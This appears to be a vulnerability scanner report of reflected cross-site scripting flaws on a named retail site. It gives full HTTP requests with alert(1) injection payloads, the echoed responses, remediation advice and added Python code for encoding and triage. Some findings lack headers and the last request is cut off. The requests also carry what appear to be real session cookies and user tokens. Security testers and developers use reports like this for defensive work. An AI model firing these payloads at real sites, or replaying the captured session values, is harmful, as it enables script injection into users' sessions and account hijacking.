Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
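The two defences above, applied to the contexts this report actually found (a double-quoted JavaScript string and an HTML comment), as an added example that is not code from the report or from the scanned application. The categoryId format, the shape of the script line and the debug-comment line are assumptions modelled on the response snippets in the findings below.

```python
import re

# Assumed format for categoryId: a short decimal identifier (the report shows
# values such as 376813). Validation rejects, it does not trim.
CATEGORY_ID_RE = re.compile(r"[0-9]{1,12}")


def validate_category_id(raw: str) -> int:
    """Return the id as an int, or raise: '3768131<script>' is refused outright
    rather than being 'sanitised' down to 3768131."""
    if not CATEGORY_ID_RE.fullmatch(raw):
        raise ValueError("categoryId must be 1-12 decimal digits")
    return int(raw)


def encode_for_html(text: str) -> str:
    """Encode every non-alphanumeric character as a numeric entity so that
    <, >, ", ' and = can never act as markup in an HTML text/attribute context."""
    return "".join(
        c if (c.isascii() and c.isalnum()) else f"&#x{ord(c):x};" for c in text
    )


def encode_for_js_string(text: str) -> str:
    """Escape every non-alphanumeric character as \\xHH or \\uHHHH so the value
    can sit inside a quoted JavaScript string literal: a double quote cannot end
    the string, and </script> cannot end the script block because < and / are
    escaped as well."""
    out = []
    for c in text:
        if c.isascii() and c.isalnum():
            out.append(c)
        elif ord(c) < 0x100:
            out.append(f"\\x{ord(c):02x}")
        else:
            out.append(f"\\u{ord(c):04x}")
    return "".join(out)


def render_vulnerable(query_string: str) -> str:
    """The pattern the findings show: the raw query string copied into a debug
    comment and into a script block (the 'var qs' line is an assumed shape)."""
    return (
        f"<!-- === Request Query String: {query_string} -->\n"
        f'<script type="text/javascript"> var qs = "{query_string}"; </script>'
    )


def render_fixed(query_string: str) -> str:
    """Drop the debug comment entirely (entities are not decoded inside comments,
    so encoding cannot make that context safe) and JS-string-encode the value."""
    return (
        '<script type="text/javascript"> var qs = "'
        f'{encode_for_js_string(query_string)}"; </script>'
    )


def reflected_unmodified(response: str, payload: str) -> bool:
    """The scanner's core check: did the payload come back byte-for-byte?"""
    return payload in response


if __name__ == "__main__":
    probe = '5e87b--><script>alert(1)</script>1e6ec6e0f69=1'
    print(render_vulnerable(probe))
    print(render_fixed(probe))
```

The encoders deliberately over-encode (everything that is not an ASCII letter or digit); that costs a few bytes and removes any argument about which metacharacters matter in which context.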
1.1. http://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /affiliate/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0809"-alert(1)-"1880324d77a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where a value must reach script, it should be encoded for a JavaScript string literal (every non-alphanumeric character as \xHH or \uHHHH, so that neither a double quote nor </script> survives) in addition to any HTML encoding, or handed to the script through a data attribute or a JSON endpoint instead. Because the name of an arbitrary parameter is reflected here, the page is not echoing one specific value, so validating individual parameters such as categoryId will not close this finding on its own.
Request
GET /affiliate/index.jsp?b0809"-alert(1)-"1880324d77a=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:27 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38154
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.2. http://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /affiliate/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5e87b--><script>alert(1)</script>1e6ec6e0f69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. Here the comment is a debug line that echoes the raw query string (<!-- === Request Query String: ... -->). HTML entities are not decoded inside comments, so output encoding is not a meaningful defence in this context; the sequence --> (and, in HTML5 parsers, --!>) anywhere in the echoed data simply ends the comment and everything after it is parsed as markup. The debug comment should be removed from production responses.
Request
GET /affiliate/index.jsp?5e87b--><script>alert(1)</script>1e6ec6e0f69=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:28 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38196
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]... <!-- === Request Query String: 5e87b--><script>alert(1)</script>1e6ec6e0f69=1 --> ...[SNIP]...
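A triage helper for findings of the two kinds shown in 1.1 and 1.2, added here as an example and not part of the report or of the scanner: given a response body and the marker strings wrapped around the payload, it works out which parsing context each marker landed in, what the application echoed between them, and whether the injected characters actually changed the context (a comment closed, a string terminated) rather than merely being reflected. The two sample responses are constructed to match the shape of the snippets in the findings; the report only shows the start of the script block, so the var qs line is an assumption, and the encoded third sample shows what a JS-string-encoded reflection would look like.

```python
import re

# Constructed samples shaped like the response snippets in findings 1.1 and 1.2.
SAMPLE_SCRIPT_RESPONSE = (
    '<html><head><script type="text/javascript"> if(ess){}else{ var ess = {}; }'
    ' var qs = "b0809"-alert(1)-"1880324d77a=1"; </script></head></html>'
)
SAMPLE_COMMENT_RESPONSE = (
    '<html><head><!-- === Request Query String: '
    '5e87b--><script>alert(1)</script>1e6ec6e0f69=1 --></head></html>'
)
# Same page after JS-string encoding of the reflected value (assumed fix).
SAMPLE_ENCODED_RESPONSE = (
    '<html><head><script type="text/javascript"> var qs = "'
    'b0809\\x22\\x2dalert\\x281\\x29\\x2d\\x221880324d77a\\x3d1"; </script></head></html>'
)

_UNESCAPED_DQ = re.compile(r'(?<!\\)"')
_UNESCAPED_SQ = re.compile(r"(?<!\\)'")


def classify_context(before: str) -> str:
    """Parsing context at the end of `before`. Heuristic: it tracks open/close
    markers and unescaped quotes, and ignores JS comments and regex literals."""
    lower = before.lower()
    if lower.rfind("<script") > lower.rfind("</script"):
        script_body = before[lower.rfind("<script"):]
        if len(_UNESCAPED_DQ.findall(script_body)) % 2:
            return "js-string-dq"
        if len(_UNESCAPED_SQ.findall(script_body)) % 2:
            return "js-string-sq"
        return "js-code"
    if before.rfind("<!--") > before.rfind("-->"):
        return "html-comment"
    if before.rfind("<") > before.rfind(">"):
        tag = before[before.rfind("<"):]
        if tag.count('"') % 2:
            return "attr-dq"
        if tag.count("'") % 2:
            return "attr-sq"
        return "tag"
    return "html-text"


def reflection_contexts(body: str, marker: str) -> list:
    """Context of every occurrence of `marker` in `body`."""
    return [classify_context(body[:m.start()])
            for m in re.finditer(re.escape(marker), body)]


def echoed_between(body: str, prefix: str, suffix: str):
    """What the application emitted between the two scanner markers, or None."""
    start = body.find(prefix)
    if start < 0:
        return None
    start += len(prefix)
    end = body.find(suffix, start)
    return None if end < 0 else body[start:end]


def breaks_out(body: str, prefix: str, injected: str) -> bool:
    """True when `injected` follows `prefix` verbatim and some prefix of it
    moves the parser into a different context than the one it started in."""
    start = body.find(prefix)
    if start < 0:
        return False
    base = start + len(prefix)
    if body[base:base + len(injected)] != injected:
        return False
    initial = classify_context(body[:base])
    return any(classify_context(body[:base + i]) != initial
               for i in range(1, len(injected) + 1))


if __name__ == "__main__":
    print(reflection_contexts(SAMPLE_SCRIPT_RESPONSE, "b0809"))
    print(echoed_between(SAMPLE_COMMENT_RESPONSE, "5e87b", "1e6ec6e0f69"))
```

Note that for the script-context payload the suffix marker ends up back inside a double-quoted string: "-alert(1)-" closes the string, inserts an expression, and reopens it so the script still parses, which is why a quote count alone does not flag it and breaks_out looks at every prefix of the injected text instead.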
The value of the categoryId request parameter is copied into an HTML comment. The payload 43c97--><script>alert(1)</script>e030957103d was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /brand/index.jsp?categoryId=376813143c97--><script>alert(1)</script>e030957103d HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:12 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31245
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o ...[SNIP]... <!-- === Request Query String: categoryId=376813143c97--><script>alert(1)</script>e030957103d --> ...[SNIP]...
The value of the categoryId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da6d"-alert(1)-"8a42c67e1e8 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /brand/index.jsp?categoryId=37681313da6d"-alert(1)-"8a42c67e1e8 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:11 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31213
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.5. http://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /brand/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a0b95--><script>alert(1)</script>cbd1ff41310 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /brand/index.jsp?a0b95--><script>alert(1)</script>cbd1ff41310=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:07 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35911
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o ...[SNIP]... <!-- === Request Query String: a0b95--><script>alert(1)</script>cbd1ff41310=1 --> ...[SNIP]...
1.6. http://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /brand/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92aee"-alert(1)-"f0867c1b267 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /brand/index.jsp?92aee"-alert(1)-"f0867c1b267=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:07 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35879
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.7. http://shop.mattel.com/cart/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /cart/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5088e"-alert(1)-"9c6b25295b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cart/index.jsp?5088e"-alert(1)-"9c6b25295b4=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:34 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38137
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.8. http://shop.mattel.com/cart/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /cart/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b30d3--><script>alert(1)</script>0933ae012e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cart/index.jsp?b30d3--><script>alert(1)</script>0933ae012e0=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:35 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Language: es-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38759
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the categoryId request parameter is copied into an HTML comment. The payload e6697--><script>alert(1)</script>c56b49c6298 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /category/index.jsp?categoryId=3718115e6697--><script>alert(1)</script>c56b49c6298 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
